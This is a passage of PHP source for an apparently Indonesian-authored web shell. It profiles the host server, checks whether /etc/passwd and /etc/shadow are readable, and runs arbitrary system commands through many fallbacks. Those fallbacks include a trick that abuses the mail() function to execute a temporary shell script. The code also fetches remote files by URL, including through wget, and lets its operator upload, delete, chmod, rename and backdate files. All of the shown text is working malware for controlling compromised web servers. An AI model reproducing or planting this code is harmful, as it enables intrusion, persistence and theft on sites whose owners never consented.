'; break;
case 'dir' : $b = ''; break;
case 'php' : $b = ''; break;
case 'zip' : $b = ''; break;
case 'img' : $b = ''; break;
case 'txt' : $b = ''; break;
case 'css' : $b = ''; break;
case 'js' : $b = ''; break;
case 'html' : $b = ''; break;
case 'other': $b = ''; break;
case 'info' : $b = ''; break;
case 'edit' : $b = ''; break;
case 'cmd' : $b = ''; break;
case 'bc' : $b = ''; break;
case 'sql' : $b = ''; break;
case 'out' : $b = ''; break;
case 'loader':$b = ''; break;
}
return $b;
}
function cwd(){
$path = '';
if(AvFunc(array('realpath'))){$path = @realpath('.'); } else { if(AvFunc(array('getcwd'))){$path = @getcwd();}}
return $path;
}
function listdirs($dir) {
if(AvFunc(array('opendir','readdir','closedir'))){
if(@is_dir($dir)){
if($handle = @opendir($dir)) {
while (($file = @readdir($handle)) !== false) {
$files[] = $file;
}
@closedir($handle);
}
}
} else {
if(AvFunc(array('scandir'))){
$files = @scandir($dir);
}
}
return isset($files) ? $files : [];
}
function disFunc(){ $df = function_exists('ini_get') ? @ini_get('disable_functions') : ''; return (!empty($df) ? explode(',', $df) : array());}
function AvFunc($list = array()){
foreach($list as $entry){
if(function_exists($entry) && !in_array($entry, disFunc())){
return true;
}
}
return false;
}
function serverSecInfo(){
function serverPanel(){
$pn = array('/usr/local/cpanel' => 'cPanel', '/usr/local/hpanel' => 'hPanel (Hostinger)', '/usr/local/psa' => 'Plesk', '/usr/local/webuzo' => 'Webuzo', '/usr/local/vesta' => 'Vesta CP', '/usr/share/webmin' => 'Virtualmin', '/www/server/panel' => 'aaPanel', '/opt/neoistone' => 'NS Panel', '/etc/neoistone' => 'NS Panel', '/usr/local/neoistone' => 'NS Panel', '/usr/local/mgr5' => 'ISP Manager', '/usr/local/mgr6' => 'ISP Manager', '/usr/local/home/admispconfig' => 'ISP Config', '/usr/local/directadmin' => 'Direct Admin', '/usr/local/solusvm/www' => 'SolusVM', '/usr/local/lxlabs/kloxo' => 'Kloxo', '/usr/local/cwp' => 'CentOS WebPanel', '/usr/local/cwpsrv' => 'CentOS WebPanel', '/var/www/html/froxlor-latest' => 'Froxlor', '/var/www/html/froxlor' => 'Froxlor', '/etc/ajenti/' => 'Ajenti');
foreach($pn as $kpn => $vpn){
if(@is_dir($kpn)){
$npn[] = $vpn;
}
}
return isset($npn) ? implode(', ', array_values(array_unique($npn))) : 'Unknown';
}
function showInf($n, $v){
$x = '';
$v = trim($v);
if($v){
$x .= ''.$n.':
'; $x .= strpos($v, "\n") == false ? '' : '';
}
return $x;
}
if(AvFunc(array('mysql_get_client_info'))){$temp[] = "MySQL (" . @mysql_get_client_info(). ")";}
if(AvFunc(array('mysqli_get_client_info'))){$temp[] = "MySQLi (" . @mysqli_get_client_info(). ")";}
if(AvFunc(array('mssql_connect'))){$temp[] = "MSSQL";}
if(AvFunc(array('pg_connect'))){$temp[] = "PostgreSQL";}
if(AvFunc(array('oci_connect'))){$temp[] = "Oracle";}
if(AvFunc(array('odbc_connect'))){$temp[] = "odbc";}
if(AvFunc(array('sqlite_open'))){$temp[] = "SQLite";}
if(class_exists('SQLite3')){$temp[] = "SQLite3";}
if(class_exists('PDO')){$temp[] = "PDO";}
$sInfo[] = showInf('System', @php_uname());
$sInfo[] = showInf('Server software', (AvFunc(array('getenv')) ? @getenv('SERVER_SOFTWARE') : 'Unknown'));
$sInfo[] = showInf('Server ip', (AvFunc(array('gethostbyname')) ? @gethostbyname($_SERVER['HTTP_HOST']) : 'Unknown'));
$sInfo[] = showInf('Server panel', serverPanel());
if(AvFunc(array('ini_get'))){
$sInfo[] = showInf('Open base dir', @ini_get('open_basedir'));
$sInfo[] = showInf('Safe mode', (@ini_get('safe_mode') ? 'ON' : 'OFF'));
$sInfo[] = showInf('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
$sInfo[] = showInf('Safe mode include dir', @ini_get('safe_mode_include_dir'));
}
$sInfo[] = showInf('PHP Version', @phpversion());
$sInfo[] = showInf('Disabled PHP Functions', (count(disFunc())>0 ? implode(', ', disFunc()) : 'none'));
$sInfo[] = showInf('Loaded Apache modules', (AvFunc(array('apache_get_modules')) ? implode(', ', @apache_get_modules()) : '-'));
$sInfo[] = showInf('cURL support', (AvFunc(array('curl_version')) ? 'Yes ('.curl_version()['version'].')' : 'No'));
$sInfo[] = showInf('Databases', (isset($temp) ? implode(', ',$temp) : 'Unknown'));
if($GLOBALS['os'] == 'nix'){
$sInfo[] = showInf('OS Version', (AvFunc(array('file_get_contents')) ? @file_get_contents('/proc/version') : 'Unknown'));
$sInfo[] = showInf('Distro name', (AvFunc(array('file_get_contents')) ? @file_get_contents('/etc/issue.net') : 'Unknown'));
if(AvFunc(array('is_readable'))){
$sInfo[] = showInf('Readable /etc/passwd', (@is_readable('/etc/passwd') ? "Yes" : "No"));
$sInfo[] = showInf('Readable /etc/shadow', (@is_readable('/etc/shadow') ? "Yes" : "No"));
}
} else {
$sInfo[] = showInf('OS Version', base64_decode(perintahnya("ver", $_SESSION['path'])['stdout']));
if(AvFunc(array('iconv'))){
$sInfo[] = showInf('Account Settings', @iconv('CP866', 'UTF-8', base64_decode(perintahnya("net accounts", $_SESSION['path'])['stdout'])));
$sInfo[] = showInf('User Accounts', @iconv('CP866', 'UTF-8', base64_decode(perintahnya("net user", $_SESSION['path'])['stdout'])));
$sInfo[] = showInf('System info', @iconv('CP866', 'UTF-8',base64_decode(perintahnya("systeminfo", $_SESSION['path'])['stdout'])));
}
}
return array_values(array_filter(array_unique($sInfo)));
}
function transferFile($xurl, $xpath, $xname){
@set_time_limit(0);
$fName = $xpath."/".$xname;
if(is_writable($xpath)){
if(AvFunc(array('file_put_contents', 'file_get_contents'))){
if(file_exists($fName)){@unlink($fName);}
$upfiles = @file_put_contents($fName, @file_get_contents($xurl));
if($upfiles){
$outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!";
} else {
$outs[] = "handling url failed!";
}
} else if(AvFunc(array('copy'))){
if(file_exists($fName)){@unlink($fName);}
$outs[] = @copy($xurl, $fName) ? $xname." uploaded!" : $xname." failed!";
} else if(AvFunc(array('curl_version', 'fopen', 'fclose'))){
if(file_exists($fName)){@unlink($fName);}
$ch = curl_init($xurl);
$fp = @fopen($fName, 'w');
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
@fclose($fp);
$outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!";
} else {
if(file_exists($fName)){@unlink($fName);}
$sendreq = perintahnya('wget -c '.$xurl.' -O '.$xname, $xpath);
$outs[] = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? $xname." uploaded!" : $xname." failed!";
}
} else {
$outs[] = $xname.' failed!';
}
return isset($outs) ? $outs : array($xname.' failed!');
}
function addDirToZip($zip, $dir, $basePath){
if(class_exists('ZipArchive')){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
$relativePath = $dir . '/' . $iterator->getSubPathName();
if ($file->isDir()) {
$zip->addEmptyDir($relativePath);
} else {
$zip->addFile($file->getRealPath(), $relativePath);
}
}
}
}
function encode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$crypttext = ''; for ($i = 0; $i < $strLen; $i++) {$ordStr = ord(substr($value, $i, 1));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$crypttext .= strrev(base_convert(dechex($ordStr + $ordKey), 16, 36));}return $crypttext;}
function decode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$decrypttext = '';for ($i = 0; $i < $strLen; $i += 2) {$ordStr = hexdec(base_convert(strrev(substr($value, $i, 2)), 36, 16));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$decrypttext .= chr($ordStr - $ordKey);}return $decrypttext;}
function generate($_a1a,$_a2a){ return $_a1a == 'encode' ? encode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle'])) : decode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle']));}
function procopen($cmd){
$descspek = array(
1 => array("pipe", "w"),
0 => array("pipe", "r"),
2 => array("pipe", "w")
);
try {
if(AvFunc(array('proc_open','proc_close','fread','feof','fclose'))){
$process = @proc_open($cmd, $descspek, $pipes);
if(is_resource($process)){
$stdout = ""; $buffer = "";
do {
$buffer = fread($pipes[1], $GLOBALS['chunk_size']); $stdout = $stdout . $buffer;
} while ((!feof($pipes[1])) && (strlen($buffer) != 0));
$stderr = ""; $buffer = "";
do {
$buffer = fread($pipes[2], $GLOBALS['chunk_size']); $stderr = $stderr . $buffer;
} while ((!feof($pipes[2])) && (strlen($buffer) != 0));
fclose($pipes[1]);
fclose($pipes[2]);
$outr = !empty($stdout) ? $stdout : $stderr;
} else {
$outr = 'Gagal eksekusi pak!, proc_open failed!';
}
proc_close($process);
} else {
$outr = 'PHP proc_open function is disabled or no exists!';
}
echo $outr;
} catch(Exception $err){
echo 'error: '.$err->getMessage();
}
}
function fakemail($func, $cmd){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$cmds = "{$cmd} > {$tmpdir}/geiss.txt";
cf($tmpdir.'/geiss.sh', base64_encode(@iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("#!/bin/sh\n{$cmds}","\r\t\0"))));
@chmod($tmpdir.'/geiss.sh', 0777);
if($func == 'mail'){
$send = @mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"');
} else {
$send = @mb_send_mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"');
}
if($send){@file_get_contents($tmpdir."/geiss.txt");}
return sleep(5);
}
}
function cf($f,$t){
if(AvFunc(array('fopen','fwrite','fputs','fclose'))){
$w=@fopen($f,"w");
if($w){
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t));
@fclose($w);
}
} else {
if(AvFunc(array('file_put_contents'))){
@file_put_contents($f,@base64_decode($t));
}
}
}
function expandPath($path) {
if(preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)){ perintahnya("echo $match[1]", $stdout); return $stdout[0] . $match[2];}
return $path;
}
function perintahnya($cmdx, $path){
$stdout = '';
if(AvFunc(array('chdir'))){
if(preg_match("/^\s*cd\s*(2>&1)?$/", $cmdx)){
@chdir(expandPath("~"));
} else if(preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmdx)){
@chdir($path);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmdx, $match);
@chdir(expandPath($match[1]));
} else {
@chdir($path);
$stdout = ex($cmdx);
}
}
$cfg = array('username' => 'Z190T', 'hostname' => 'shell');
if($GLOBALS['os'] == 'nix'){
if(AvFunc(array('posix_getpwuid','posix_geteuid'))){ $pwuid = @posix_getpwuid(@posix_geteuid());if($pwuid !== false){ $cfg['username'] = $pwuid['name'];}}
} else {
if(AvFunc(array('getenv'))){ $username = @getenv('USERNAME');if($username !== false){ $cfg['username'] = $username;}}
}
if(AvFunc(array('gethostname'))){ $hostname = @gethostname(); if($hostname !== false){ $cfg['hostname'] = $hostname;}}
$_SESSION['path'] = AvFunc(array('getcwd')) ? str_replace('\\','/', cwd()) : $_SERVER['DOCUMENT_ROOT'];
return array('userhost' => base64_encode($cfg['username']."@".$cfg['hostname']), 'path' => base64_encode($_SESSION['path']), 'stdout' => base64_encode($stdout));
}
function ex($init){
$out = '';
if(!preg_match('/2>/', $init)){$init.=' 2>&1';}
$tmpout = `$init`;
if(strlen($tmpout)>0){
$out = $tmpout;
} else {
foreach(array('proc_open', 'popen', 'exec', 'passthru', 'system', 'shell_exec', 'mail', 'mb_send_mail') as $c){
if($c == 'proc_open'){
if(AvFunc(array($c, 'ob_start', 'ob_get_clean'))){ob_start(); procopen($init); $out=ob_get_clean(); break;}
} else if($c == 'exec'){
if(AvFunc(array($c))){@$c($init,$outs); $out=@join("\n",$outs); break;}
} else if($c == 'system' || $c == 'passthru'){
if(AvFunc(array('system', 'passthru', 'ob_start', 'ob_get_clean'))){ob_start(); @$c($init); $out=ob_get_clean(); break;}
} else if($c == 'shell_exec'){
if(AvFunc(array($c))){$out=$c($init); break;}
} else if($c == 'mail' || $c == 'mb_send_mail'){
if(AvFunc(array('mail', 'mb_send_mail', 'ob_start', 'ob_get_clean'))){ob_start(); fakemail("{$c}",$init); $out=ob_get_clean(); break;}
} else {
if(AvFunc(array($c, 'feof', 'fread', 'fclose'))){if(is_resource($f = @$c($init, "r"))){$out=''; while(!@feof($f)){$out.=fread($f, $GLOBALS['chunk_size']);}fclose($f);} break;}
}
}
if(strlen($out)<=0){
$out = 'gak bisa jalanin perintah, coba cek disable_functions server ini!';
}
}
return $out;
}
function statusnya($file){
$stx = @fileperms($file);
if(($stx & 0xC000) == 0xC000){ $info = 's'; /* Socket */ }
elseif(($stx & 0xA000) == 0xA000){ $info = 'l'; /* Symbolic Link */ }
elseif(($stx & 0x8000) == 0x8000){ $info = '-'; /* Regular */ }
elseif(($stx & 0x6000) == 0x6000){ $info = 'b'; /* Block special */ }
elseif(($stx & 0x4000) == 0x4000){ $info = 'd'; /* Directory */ }
elseif(($stx & 0x2000) == 0x2000){ $info = 'c'; /* Character special */ }
elseif(($stx & 0x1000) == 0x1000){ $info = 'p'; /* FIFO pipe */ }
else { $info = 'u'; /* Unknown */ }
/* Owner */
$info .= ($stx & 0x0100) ? 'r' : '-';
$info .= ($stx & 0x0080) ? 'w' : '-';
$info .= (($stx & 0x0040) ? (($stx & 0x0800) ? 's' : 'x' ) : (($stx & 0x0800) ? 'S' : '-'));
/* Group */
$info .= ($stx & 0x0020) ? 'r' : '-';
$info .= ($stx & 0x0010) ? 'w' : '-';
$info .= (($stx & 0x0008) ? (($stx & 0x0400) ? 's' : 'x' ) : (($stx & 0x0400) ? 'S' : '-'));
/* World */
$info .= ($stx & 0x0004) ? 'r' : '-';
$info .= ($stx & 0x0002) ? 'w' : '-';
$info .= (($stx & 0x0001) ? (($stx & 0x0200) ? 't' : 'x' ) : (($stx & 0x0200) ? 'T' : '-'));
return $info;
}
function stColor($f){$colors = '';if(!@is_readable($f)){$colors = 'text-danger';} else if(!@is_writable($f)){$colors = 'text-warning';} else {$colors = 'text-success';}return $colors;}
function owner($filename){
$owner = AvFunc(array('fileowner')) ? @fileowner($filename) : '?';
$group = AvFunc(array('filegroup')) ? @filegroup($filename) : '?';
if(AvFunc(array('posix_getpwuid'))){
$owner = @posix_getpwuid($owner);
$owner = isset($owner['name']) ? $owner['name'] : '?';
}
if(AvFunc(array('posix_getgrgid'))){
$group = @posix_getgrgid($group);
$group = isset($group['name']) ? $group['name'] : '?';
}
return array('owner' => $owner, 'group' => $group);
}
function sizeFilter($bytes){
$label = array('B', 'KB', 'MB', 'GB', 'TB', 'PB');
for($i = 0; $bytes >= 1024 && $i < ( count( $label ) -1 ); $bytes /= 1024, $i++);
return(round($bytes, 2) . " " . $label[$i]);
}
function countDir($filename){return @count(listdirs($filename)) - 2;}
function xrmdir($dir){
$items = listdirs($dir);
if($items){
foreach($items as $item) {
if($item === '.' || $item === '..'){
continue;
}
$path = $dir.'/'.$item;
if(@is_dir($path)){ xrmdir($path); } else { @unlink($path); }
}
rmdir($dir);
}
}
function gandakanDir($source, $destination) {
if(!@is_dir($source)){
return false;
}
if(!file_exists($destination)){
@mkdir($destination, 0777, true);
}
$items = listdirs($source);
foreach($items as $item){
if ($item === '.' || $item === '..') {
continue;
}
$sourceItem = $source . '/' . $item;
$destinationItem = $destination . '/' . $item;
if (@is_dir($sourceItem)) {
gandakanDir($sourceItem, $destinationItem);
} else {
@copy($sourceItem, $destinationItem);
}
}
return true;
}
function urutberkas($a){
$b = listdirs($a);
$i = array();
if(is_array($b) && count($b)>0){
foreach($b as $v){
$dir = $a.'/'.$v;
if(@is_dir($dir) && !in_array($v, array('.', '..'))){
$i[] = array('type' => 'dir', 'entry' => $v, 'entry_path' => $a, 'full_path' => $dir);
} else {
if(!in_array($v, array('.', '..'))){
$i[] = array('type' => 'file', 'entry' => $v, 'entry_path' => $a, 'full_path'=> $dir);
}
}
}
$col1 = array_column($i, 'type');
$col2 = array_column($i, 'entry');
array_multisort($col1, SORT_ASC, $col2, SORT_ASC, $i);
}
return $i;
}
function pathberkas($a){
$lb = explode('/', $a);
if(isset($lb) && count($lb)>0){
$outs = '";
} else {
$outs = "gak bisa baca direktori ini gess..";
}
return $outs;
}
function FManager($fm){
$lokasinya = urutberkas($fm);
$fmtable = "";
$fmtable .= "
";
$fmtable .= "| Name | Modified | User/Group | Permission | Options |
|---|
";
$fmtfoot = "";
$cDir = 0; $cFile = 0;
if(count($lokasinya)>0){
$nDirsd = "";
foreach($lokasinya as $kl => $dir){
$nDirsd = $dir['entry_path'];
$owner = owner($dir['full_path']);
$fSize = $dir['type'] == 'dir' ? countDir($dir['full_path']) . " items" : sizeFilter(@filesize($dir['full_path']));
if($dir['type'] == 'dir'){
$cDir += 1;
$zadd = "";
if(class_exists('ZipArchive')){
$zadd .= "";
}
$zadd .= "";
$zadd .= "";
$txcol = stColor($dir['full_path']);
switch($txcol){
case 'text-danger' : $dlinks = "{$dir['entry']}"; break;
case 'text-warning' : $dlinks = "{$dir['entry']}"; break;
case 'text-success' :$dlinks = "{$dir['entry']}"; break;
}
if(!in_array($dir['entry'], array('.', '..'))){
switch($txcol){
case 'text-danger' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break;
case 'text-warning' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break;
case 'text-success' :
$formper = "" . statusnya($dir['full_path']) . "";
$formsel = "";
break;
default : $formper = statusnya($dir['full_path']); $formsel = "-";
}
} else {
$formper = statusnya($dir['full_path']);
$formsel = "";
}
$formper .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4)."";
$fmtable .= "
|
|
|
".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." |
{$owner['owner']}/{$owner['group']} |
{$formper} |
{$formsel} |
";
} else {
$cFile += 1;
$fcolor = stColor($dir['full_path']);
switch($fcolor){
case 'text-danger' : $flinks = "".statusnya($dir['full_path']).""; break;
case 'text-warning' : $flinks = "".statusnya($dir['full_path']).""; break;
case 'text-success' :$flinks = "" . statusnya($dir['full_path']) . ""; break;
}
$flinks .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4)."";
$zadd = "";
$ext = pathinfo($dir['full_path'], PATHINFO_EXTENSION);
if(!empty($ext)){
switch(strtolower(ucwords($ext))){
case'css': case'less': $ftype = fType('css','1.5em'); break;
case'txt': case'ini': $ftype = fType('txt'); break;
case'js': case'json': $ftype = fType('js','1.8em'); break;
case'php': case'phtml': case'php5': case'php7': case'phar': case'inc': case'module': case'hphp': case'ctp': case'hphp': $ftype = fType('php'); break;
case'html': case'htm': case'shtml': case'xhtml': case'xml': $ftype = fType('html'); break;
case'zip': case'rar': case'tar': case'bz': case'gz': case'tgz': $ftype = fType('zip'); break;
case'jpg': case'png': case'bmp': case'gif': case'webp': case'psd': case'jpeg': case'ico': case'ai': case'xcf': case'cdr': case'tif': case'tif': case'tiff': case'eps': $ftype = fType('img'); break;
default: $ftype = fType('other');
}
if($ext == 'zip'){
if(class_exists('ZipArchive')){
$zadd .= "";
}
}
if($ext == 'tar'){
$zadd .= "";
}
if(in_array($ext, ['gz','tgz'])){
$zadd .= "";
}
} else {
$ftype = fType('other');
}
switch($fcolor){
case 'text-danger' : $fselc = "-"; break;
case 'text-warning' : $fselc = ""; break;
case 'text-success' : $fselc = ""; break;
}
$fmtable .= "
|
|
|
".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." |
{$owner['owner']}/{$owner['group']} |
{$flinks} |
{$fselc} |
";
}
}
$zadx ="";
if(class_exists("ZipArchive")){
$zadx .= "";
}
$fmtfoot .= "
|
|
|
Dir: {$cDir}, Files: {$cFile} |
";
} else {
$fmtable .= "| Direktori tidak berisi file apapun |
";
}
$fmtable .= "{$fmtfoot}
". @iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("".base64_decode($sendreq['userhost']).":".base64_decode($sendreq['path'])."# {$_POST['cmd']}
".htmlspecialchars(base64_decode($sendreq['stdout']))."","\t\0"))."");
$outs['path'] = $sendreq['path'];
$outs['userhost'] = $sendreq['userhost'];
} else {
$outs['stdout'] = base64_encode("Sebenernya, apa sih yang anda perintahkan?
");
$outs['path'] = base64_encode($_SESSION['path']);
$outs['userhost'] = base64_encode('0');
}
header("Content-type: application/json; charset=utf-8");
echo json_encode($outs);
clearstatcache();
die();
}
} else if($_GET['act'] == 'mkdir'){
$ndir = isset($_POST['xdir']) && !empty($_POST['xdir']) ? $_POST['xdir'] : '';
if(!empty($ndir)){
$xpath = $_POST['xpath']."/".$ndir;
if($_POST['xtype'] == 'dir'){
if(!@is_dir($xpath)){
if(@mkdir($xpath, 0755, true)){
$outs = "Direktori berhasil dibuat!";
} else {
$sendreq = perintahnya("mkdir ".$xpath, $_POST['xpath']);
$outs = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? "Direktori berhasil dibuat!" : "Gagal membuat direktori!";
}
} else {
$outs = "Direktori sudah ada!";
}
} else {
if($_POST['xtype'] == 'file'){
if(!file_exists($xpath)){
if(AvFunc(array('fopen','fclose'))){
$fp = @fopen($xpath, 'w');
if($fp){
$xpath = "ok, tinggal di edit..";
fclose($fp);
}
$outs = "File berhasil dibuat!";
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($xpath, "");
$outs = file_exists($xpath) ? "File berhasil dibuat!" : "Gagal membuat file!";
}
} else {
$outs = "File sudah ada, cobalah membuat file dengan nama yang berbeda!";
}
} else {
$outs = "Anda mw buat apa??";
}
}
} else {
$outs = "Path tidak valid!";
}
echo $outs;
die();
} else if($_GET['act'] == 'readfile'){
if(isset($_POST['xpath']) && !empty($_POST['xpath'])){
$xpath = $_POST['xpath'];
if(@is_readable($xpath)){
$outs = '';
if(@filesize($xpath)>0){
if(AvFunc(array('fopen','fread','fclose','feof'))){
$fp = @fopen($xpath, 'r');
if($fp){
while(!@feof($fp)){$outs .= htmlspecialchars(@fread($fp, @filesize($xpath)));}
@fclose($fp);
}
} else if(AvFunc(array('file_get_contents'))){
$outs = @file_get_contents($df);
} else {
$outs = "File {$_GET['entry']} gak bisa dibaca!";
}
} else {
if(AvFunc(array('file_get_contents'))){$outs = @file_get_contents($df);}
}
} else {
$outs = "File {$_GET['entry']} gak bisa dibaca!";
}
} else {
$outs = "File yang mw dibaca, gk ada!";
}
echo $outs;
die();
} else if($_GET['act'] == 'uploader'){
$xpath = $_POST['xpath'];
$xurl = $_POST['xurl'];
$xname = $_POST['xname'];
if(is_writable($xpath)){
if(empty($xurl) || !filter_var($xurl, FILTER_VALIDATE_URL)){$errs[] = "Url tidak valid!";}
if(empty($xname)){$errs[] = "Nama file tidak boleh kosong!";}
if(isset($errs)){
$outs[] = $errs;
} else {
$outs = transferFile($xurl, $xpath, $xname);
}
} else {
$outs[] = "Gak bisa upload file di direktori ini!";
}
echo isset($outs) ? implode('
', $outs) : 'Invalid file!';
die();
} else if($_GET['act'] == 'upload'){
@ini_set('output_buffering', 0);
$xpath = $_POST['xpath'];
if(is_writable($xpath)){
for($cf=0; $cf 0){
$fname = @$_FILES['xfile']['name'][$cf];
$ftmp = @$_FILES['xfile']['tmp_name'][$cf];
if(AvFunc(array('move_uploaded_file'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$outs[] = @move_uploaded_file($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else if(AvFunc(array('file_put_contents', 'file_get_contents'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$upfiles = @file_put_contents($xpath."/".$fname, @file_get_contents(@$ftmp));
if($upfiles){
$outs[] = file_exists($xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else {
$outs[] = $fname." failed!";
}
} else if(AvFunc(array('copy'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$outs[] = @copy($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else {
$outs[] = $fname." failed!";
}
}
}
} else {
$outs[] = "Gak bisa upload file di direktori ini!";
}
echo isset($outs) ? implode('
', $outs) : 'Invalid file!';
die();
} else if($_GET['act'] == 'rename'){
if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['oname'])){
$ren = @rename($_POST['xpath'].'/'.$_POST['oname'], $_POST['xpath'].'/'.$_POST['xname']);
$outss = $ren == true ? 'Berhasil mengubah nama '.$_POST['xtype'] : 'Gagal mengubah nama '.$_POST['xtype'];
echo $outss;
die();
}
} else if($_GET['act'] == 'touch'){
if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['xtime'])){
$time = strtotime($_POST['xtime']);
$fd = $_POST['xpath'].'/'.$_POST['xname'];
if($time){
$outs = !touch($fd, $time, $time) ? 'Fail!' : 'Touched!';
} else {
$outs = 'Format waktu tidak valid!';
}
clearstatcache();
echo $outs;
die();
}
} else if($_GET['act'] == 'chmod'){
if(isset($_POST['xperm']) && !empty($_POST['xperm'])){
$xperm = $_POST['xperm'];
$xtype = $_POST['xtype'];
$xname = $_POST['xname'];
$xpath = $_POST['xpath'];
$perms = 0;
for($i=strlen($xperm)-1;$i>=0;--$i){
$perms += (int)$xperm[$i]*pow(8, (strlen($xperm)-$i-1));
}
$cm = @chmod("{$xpath}/{$xname}", $perms);
$outss = $cm == true ? 'chmod '.$xtype.': '.$xname.', berhasil!' : 'chmod '.$xtype.': '.$xname.', gagal!';
} else {
$outss = 'Permission tidak boleh kosong!';
}
clearstatcache();
echo $outss;
die();
} else if($_GET['act'] == 'copy'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'], $_POST['xtarget'])){
$df = rtrim($_POST['xpath'],'/') .'/'. $_POST['xname'];
$target = rtrim($_POST['xtarget'], '/');
if(!@is_dir($target)){
echo 'Tujuan ('. $target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('. $target.') is not writeable!';
die();
}
if($_POST['xtype'] == 'file'){
if(file_exists($df)){
$outss = @copy($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di copy!' : $_POST['xname'].' gagal di copy!';
} else {
$outss = $_POST['xname'].' sudah ada!';
}
} else if($_POST['xtype'] == 'dir'){
if(gandakanDir($df, $target.'/'.$_POST['xname'])){
$outss = $_POST['xname'].' berhasil di copy!';
} else {
$outss = $_POST['xname'].' gagal di copy!';
}
}
} else {
$outss = 'permintaan tidak lengkap!';
}
echo $outss;
die();
} else if($_GET['act'] == 'cut'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'], $_POST['xtarget'])){
$df = rtrim($_POST['xpath'],'/') .'/'. $_POST['xname'];
$target = rtrim($_POST['xtarget'], '/');
if(!@is_dir($target)){
echo 'Tujuan ('. $target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('. $target.') is not writeable!';
die();
}
if($_POST['xtype'] == 'file'){
if(file_exists($df)){
$outss = @rename($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di pindahkan!' : $_POST['xname'].' gagal di pindahkan!';
} else {
$outss = $_POST['xname'].' sudah ada!';
}
} else if($_POST['xtype'] == 'dir'){
if(@is_dir($df)){
$outss = @rename($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di pindahkan!' : $_POST['xname'].' gagal di pindahkan!';
} else {
$outss = $df.' tidak ditemukan!';
}
}
} else {
$outss = 'permintaan tidak lengkap!';
}
echo $outss;
die();
} else if($_GET['act'] == 'del'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'])){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
if($_POST['xtype'] == 'dir' && @is_dir($df)){
if(file_exists($df)){
xrmdir($df);
}
$outss = file_exists($df) ? "Hapus dir gagal!" : "Hapus dir sukses!";
} else if($_POST['xtype'] == 'file' && @is_file($df)){
if(file_exists($df)){
@unlink($df);
}
$outss = file_exists($df) ? "Hapus file gagal!" : "Hapus file sukses!";
}
echo $outss;
die();
}
} else if($_GET['act'] == 'tar'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? current($fnm).'.tar' : $_POST['xname'].'.tar';
if(file_exists($newname)){
unlink($_POST['xpath'].'/'.$newname);
}
perintahnya("tar cf {$newname} {$_POST['xname']}", $_POST['xpath']);
$outs = file_exists($_POST['xpath']."/".$newname) ? "archived success" : "archived failed";
echo $outs;
die();
} else if($_GET['act'] == 'tgz'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? current($fnm).'.tar.gz' : $_POST['xname'].'.tar.gz';
if(file_exists($newname)){
unlink($_POST['xpath'].'/'.$newname);
}
perintahnya("tar czf {$newname} {$_POST['xname']}", $_POST['xpath']);
$outs = file_exists($_POST['xpath']."/".$newname) ? "archived success" : "archived failed";
echo $outs;
die();
} else if($_GET['act'] == 'zip'){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? $_POST['xpath']."/".current($fnm) : $df;
if(file_exists($newname.'.zip')){
